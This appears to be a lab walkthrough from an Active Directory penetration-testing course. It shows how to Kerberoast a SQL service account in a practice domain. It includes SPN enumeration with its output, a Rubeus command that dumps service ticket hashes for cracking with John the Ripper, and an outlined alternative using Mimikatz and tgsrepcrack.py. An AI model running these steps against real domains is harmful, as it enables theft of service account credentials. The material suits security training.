Obj 14 Kerberoast Pass Crack

Task - Using the Kerberoast attack, crack password of a SQL server service account.

Get Domain User SPN

PS C:\AD\Tools> Get-DomainUser -SPN

Output:
samaccountname : svcadmin

serviceprincipalname : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433, 
MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}

This shows us that svcadmin has a SPN that we can kerberoast

Use Rubeus and John the Ripper to get the hash and crack it

C:\AD\Tools>C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple 
/rc4opsec /outfile:C:\AD\Tools\hashes.txt

We can now use the file hashes.txt we just created with John the Ripper

- OPTION 2 -

KerberosRequestorSecurityToken.NET class from PowerShell, Mimikatz and tgsrepcrack.py

Use the KerberosRequestorSecurityToken.NET class from PowerShell to request a TGS

Check to see if we have the TGS for the service now

Let's dump the tickets to disk

Now we have a kirbi file we crack with tgsrepcrack.py

Last updated